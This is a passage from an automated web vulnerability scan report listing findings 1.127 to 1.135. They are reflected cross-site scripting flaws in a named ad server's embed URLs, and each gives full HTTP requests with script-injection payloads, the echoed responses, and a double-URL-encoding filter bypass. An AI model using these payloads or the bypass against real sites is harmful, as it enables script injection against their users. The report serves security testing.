Date: Tue, 22 Mar 2011 21:44:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2659

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*903c1"><script>alert(1)</script>c509db9eahttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db3c2"-alert(1)-"a93a31619 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*db3c2"-alert(1)-"a93a31619 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2629

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*db3c2"-alert(1)-"a93a31619">
...[SNIP]...

1.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d85c0"><script>alert(1)</script>789f2fc281d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&d85c0"><script>alert(1)</script>789f2fc281d=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
i/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&d85c0"><script>alert(1)</script>789f2fc281d=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e1de"-alert(1)-"d2c3f12913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&4e1de"-alert(1)-"d2c3f12913=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2637

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
i/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&4e1de"-alert(1)-"d2c3f12913=1">
...[SNIP]...

1.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [ybt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 639f8</script><script>alert(1)</script>ee2b459cca0 was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319639f8</script><script>alert(1)</script>ee2b459cca0&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830278**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319639f8</script><script>alert(1)</script>ee2b459cca0&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251
...[SNIP]...

1.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yhdata parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7e8a</script><script>alert(1)</script>e533f5769fb was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=f7e8a</script><script>alert(1)</script>e533f5769fb&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830011**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=f7e8a</script><script>alert(1)</script>e533f5769fb&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW8
...[SNIP]...

1.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yyob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9bdd</script><script>alert(1)</script>98903d590b7 was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=c9bdd</script><script>alert(1)</script>98903d590b7&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830130**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=c9bdd</script><script>alert(1)</script>98903d590b7&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFs
...[SNIP]...

1.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcce</script><script>alert(1)</script>725f9991d9b was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,abcce</script><script>alert(1)</script>725f9991d9b&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830211**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,abcce</script><script>alert(1)</script>725f9991d9b&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/
...[SNIP]...

1.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fce6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6705cfb4e0 was submitted in the REST URL parameter 2. This input was echoed as 1fce6"><script>alert(1)</script>b6705cfb4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313571fce6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6705cfb4e0/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313571fce6"><script>alert(1)</script>b6705cfb4e0/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 739ff%2522%253balert%25281%2529%252f%252f281133da14 was submitted in the REST URL parameter 2. This input was echoed as 739ff";alert(1)//281133da14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357739ff%2522%253balert%25281%2529%252f%252f281133da14/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
